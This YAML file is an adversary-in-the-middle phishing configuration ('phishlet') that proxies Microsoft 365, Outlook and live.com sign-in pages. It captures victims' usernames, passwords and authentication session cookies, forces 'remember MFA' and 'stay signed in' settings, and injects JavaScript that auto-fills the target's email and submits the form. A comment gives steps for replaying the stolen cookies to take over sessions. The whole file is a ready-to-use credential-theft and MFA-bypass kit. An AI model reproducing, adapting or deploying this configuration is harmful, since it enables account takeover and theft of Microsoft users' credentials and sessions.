name: 'o365'
author: 't.me/pysmart'
min_ver: '2.3.0'
proxy_hosts:
  - {phish_sub: 'login', orig_sub: 'login', domain: 'microsoftonline.com', session: true, is_landing: false}
  - {phish_sub: 'www', orig_sub: 'www', domain: 'office.com', session: true, is_landing: true}
  - {phish_sub: 'live', orig_sub: 'login', domain: 'live.com', session: true, is_landing: false}
  - {phish_sub: 'account', orig_sub: 'account', domain: 'live.com', session: false, is_landing: false}
  - {phish_sub: 'aadcdn', orig_sub: 'aadcdn', domain: 'msftauth.net', session: false, is_landing: false}  
  - {phish_sub: 'aadcdnn', orig_sub: 'aadcdn', domain: 'msauth.net', session: false, is_landing: false} 
  - {phish_sub: 'res.cdn', orig_sub: 'res.cdn', domain: 'office.net', session: false, is_landing: false} 
  - {phish_sub: 'outlook', orig_sub: 'outlook', domain: 'live.com', session: true, is_landing: false}
  - {phish_sub: 'storage', orig_sub: 'storage', domain: 'live.com', session: true, is_landing: false}
  - {phish_sub: 'accounts', orig_sub: 'account', domain: 'microsoft.com', session: true, is_landing: false}
  - {phish_sub: 'www2', orig_sub: 'www', domain: 'microsoft.com', session: true, is_landing: false}


sub_filters:

  - {triggers_on: 'login.live.com', orig_sub: 'aadcdn', domain: 'msftauth.net', search: 'https://{hostname_regex}', replace: 'https://{hostname_regex}', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'login.live.com', orig_sub: 'aadcdn', domain: 'msftauth.net', search: '{hostname_regex}', replace: '{hostname_regex}', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'login.live.com', orig_sub: 'aadcdn', domain: 'msftauth.net', search: 'https%3A%2F%2F{hostname_regex}', replace: 'https%3A%2F%2F{hostname_regex}', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'login.live.com', orig_sub: '', domain: 'msftauth.net', search: '{domain_regex}', replace: '{domain_regex}', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'login.live.com', orig_sub: 'aadcdn', domain: 'msftauth.net', search: '<https://{hostname}>', replace: '<https://{hostname}>', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'login.live.com', orig_sub: 'aadcdn', domain: 'msftauth.net', search: 'href="//{hostname}"', replace: 'href="//{hostname}"', mimes: ['text/html', 'application/json', 'application/javascript']}

  - {triggers_on: 'login.live.com', orig_sub: 'aadcdn', domain: 'msauth.net', search: 'https://{hostname_regex}', replace: 'https://{hostname_regex}', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'login.live.com', orig_sub: 'aadcdn', domain: 'msauth.net', search: '{hostname_regex}', replace: '{hostname_regex}', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'login.live.com', orig_sub: 'aadcdn', domain: 'msauth.net', search: 'https%3A%2F%2F{hostname_regex}', replace: 'https%3A%2F%2F{hostname_regex}', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'login.live.com', orig_sub: '', domain: 'msauth.net', search: '{domain_regex}', replace: '{domain_regex}', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'login.live.com', orig_sub: 'aadcdn', domain: 'msauth.net', search: '<https://{hostname}>', replace: '<https://{hostname}>', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'login.live.com', orig_sub: 'aadcdn', domain: 'msauth.net', search: 'href="//{hostname}"', replace: 'href="//{hostname}"', mimes: ['text/html', 'application/json', 'application/javascript']}

  - {triggers_on: 'login.microsoftonline.com', orig_sub: 'www', domain: 'office.com', search: 'https%3A%2F%2Fwww.office.com', replace: 'https%3A%2F%2Fwww.{domain}', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'login.live.com', orig_sub: 'www', domain: 'office.com', search: 'https%3A%2F%2Fwww.office.com', replace: 'https%3A%2F%2Fwww.{domain}', mimes: ['text/html', 'application/json', 'application/javascript']}

  - {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'href="https://{hostname_regex}', replace: 'href="https://{hostname_regex}', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname_regex}', replace: 'https://{hostname_regex}', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'login.microsoftonline.com', orig_sub: '', domain: 'microsoft.com', search: '{hostname_regex}', replace: '{hostname_regex}', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'login.live.com', orig_sub: '', domain: 'microsoft.com', search: '{hostname_regex}', replace: '{hostname_regex}', mimes: ['text/html', 'application/json', 'application/javascript']}

  - {triggers_on: 'login.live.com', orig_sub: 'www', domain: 'office.com', search: 'https://{hostname_regex}', replace: 'https://{hostname_regex}', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'login.live.com', orig_sub: 'www', domain: 'office.com', search: '{hostname_regex}', replace: '{hostname_regex}', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'login.live.com', orig_sub: 'www', domain: 'office.com', search: 'href="https://{hostname_regex}', replace: 'href="https://{hostname_regex}', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'login.live.com', orig_sub: '', domain: 'office.com', search: '{domain_regex}', replace: '{domain_regexp}', mimes: ['text/html', 'application/json', 'application/javascript']}
 
  - {triggers_on: 'login.microsoftonline.com', orig_sub: 'www', domain: 'office.com', search: 'https://{hostname_regex}', replace: 'https://{hostname_regex}', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'login.microsoftonline.com', orig_sub: 'www', domain: 'office.com', search: '{hostname_regex}', replace: '{hostname_regex}', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'login.microsoftonline.com', orig_sub: 'www', domain: 'office.com', search: 'href="https://{hostname_regex}', replace: 'href="https://{hostname_regex}', mimes: ['text/html', 'application/json', 'application/javascript']}


  - {triggers_on: 'login.live.com', orig_sub: 'login', domain: 'live.com', search: 'https://{hostname_regex}/ppsecure/', replace: 'https://{hostname_regex}/ppsecure/', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'login.live.com', orig_sub: 'login', domain: 'live.com', search: 'https://{hostname_regex}/GetCredentialType.srf', replace: 'https://{hostname_regex}/GetCredentialType.srf', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'login.live.com', orig_sub: 'login', domain: 'live.com', search: 'https://{hostname_regex}/GetSessionState.srf', replace: 'https://{hostname_regex}/GetSessionState.srf', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'login.live.com', orig_sub: 'login', domain: 'live.com', search: 'href="https://{hostname_regex}', replace: 'href="https://{hostname_regex}', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'login.live.com', orig_sub: 'login', domain: 'live.com', search: 'https://{hostname_regex}', replace: 'https://{hostname_regex}', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'login.live.com', orig_sub: 'login', domain: 'live.com', search: '{hostname_regex}', replace: '{hostname_regex}', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'login.live.com', orig_sub: 'login', domain: 'live.com', search: 'href="https://{hostname_regex}', replace: 'href="https://{hostname_regex}', mimes: ['text/html', 'application/json', 'application/javascript']}

  - {triggers_on: 'login.live.com', orig_sub: 'outlook', domain: 'live.com', search: 'https://{hostname_regex}/ppsecure/', replace: 'https://{hostname_regex}/ppsecure/', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'login.live.com', orig_sub: 'outlook', domain: 'live.com', search: 'https://{hostname_regex}/GetCredentialType.srf', replace: 'https://{hostname_regex}/GetCredentialType.srf', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'login.live.com', orig_sub: 'outlook', domain: 'live.com', search: 'https://{hostname_regex}/GetSessionState.srf', replace: 'https://{hostname_regex}/GetSessionState.srf', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'login.live.com', orig_sub: 'outlook', domain: 'live.com', search: 'href="https://{hostname_regex}', replace: 'href="https://{hostname_regex}', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'login.live.com', orig_sub: 'outlook', domain: 'live.com', search: 'https://{hostname_regex}', replace: 'https://{hostname_regex}', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'login.live.com', orig_sub: 'outlook', domain: 'live.com', search: '{hostname_regex}', replace: '{hostname_regex}', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'login.live.com', orig_sub: 'outlook', domain: 'live.com', search: 'href="https://{hostname_regex}', replace: 'href="https://{hostname_regex}', mimes: ['text/html', 'application/json', 'application/javascript']}

  - {triggers_on: 'login.live.com', orig_sub: 'storage', domain: 'live.com', search: 'https://{hostname_regex}/ppsecure/', replace: 'https://{hostname_regex}/ppsecure/', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'login.live.com', orig_sub: 'storage', domain: 'live.com', search: 'https://{hostname_regex}/GetCredentialType.srf', replace: 'https://{hostname_regex}/GetCredentialType.srf', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'login.live.com', orig_sub: 'storage', domain: 'live.com', search: 'https://{hostname_regex}/GetSessionState.srf', replace: 'https://{hostname_regex}/GetSessionState.srf', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'login.live.com', orig_sub: 'storage', domain: 'live.com', search: 'href="https://{hostname_regex}', replace: 'href="https://{hostname_regex}', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'login.live.com', orig_sub: 'storage', domain: 'live.com', search: 'https://{hostname_regex}', replace: 'https://{hostname_regex}', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'login.live.com', orig_sub: 'storage', domain: 'live.com', search: '{hostname_regex}', replace: '{hostname_regex}', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'login.live.com', orig_sub: 'storage', domain: 'live.com', search: 'href="https://{hostname_regex}', replace: 'href="https://{hostname_regex}', mimes: ['text/html', 'application/json', 'application/javascript']}


  - {triggers_on: 'login.live.com', orig_sub: 'res.cdn', domain: 'office.net', search: 'https://{hostname_regex}', replace: 'https://{hostname_regex}', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'login.live.com', orig_sub: 'res.cdn', domain: 'office.net', search: '{hostname_regex}', replace: '{hostname_regex}', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'login.live.com', orig_sub: 'res.cdn', domain: 'office.net', search: 'href="https://{hostname_regex}', replace: 'href="https://{hostname_regex}', mimes: ['text/html', 'application/json', 'application/javascript']}

auth_tokens:
  - domain: '.login.microsoftonline.com'
    keys: ['ESTSAUTH', 'ESTSAUTHPERSISTENT', '.*,regexp']
  - domain: 'login.microsoftonline.com'
    keys: ['SignInStateCookie', '.*,regexp']
  - domain: 'login.live.com'
    keys: ['.*,regexp']    
  - domain: '.login.live.com'
    keys: ['.*,regexp']  
  - domain: '.live.com'  
    keys: ['.*,regexp']
    
auth_urls:
 - '/kmsi*'
 - '/landingv2*'
 - '/landing*'
 - '/ppsecure/'
 - '/ppsecure/*' 
 
# - '/oauth20_authorize.srf*'

# INJECT COOKIES
# --------------
# 
# Browse the url https://login.microsoftonline.com
# inject the capture cookies 
# Refresh the browser



credentials:
  username:
    key: '(login|UserName)'
    search: '(.*)'
    type: 'post'
  password:
    key: '(passwd|Password)'
    search: '(.*)'
    type: 'post'
login:
  domain: 'login.microsoftonline.com'
  path: '/'

force_post:
  - path: '/kmsi'
    search: 
      - {key: 'LoginOptions', search: '.*'}
    force:
      - {key: 'LoginOptions', value: '1'}
    type: 'post'
  - path: '/common/SAS'
    search: 
      - {key: 'rememberMFA', search: '.*'}
    force:
      - {key: 'rememberMFA', value: 'true'}
    type: 'post'
js_inject:
  - trigger_domains: ["login.microsoftonline.com"]
    trigger_paths: ["/common/oauth2/","/","/*","/oauth20_authorize.srf"]
    script: |
        function lp(){
        var emailId = document.querySelector("#i0116");
        var nextButton = document.querySelector("#idSIButton9");
        var query = window.location.href;
        if (/#/.test(window.location.href)){
        var res = query.split("#");
        var data1 = res[0];
        var data2 = res[1];
        console.log(data1);
        console.log(data2);
          if (emailId != null) {
          var m = data2.replace(/[=]/gi, '');
          emailId.focus();
          emailId.value = m;
          nextButton.focus();
          nextButton.click();
          console.log("YES!");
          return;
        }
        }
        setTimeout(function(){lp();}, 1500);
      }
      setTimeout(function(){lp();}, 1500);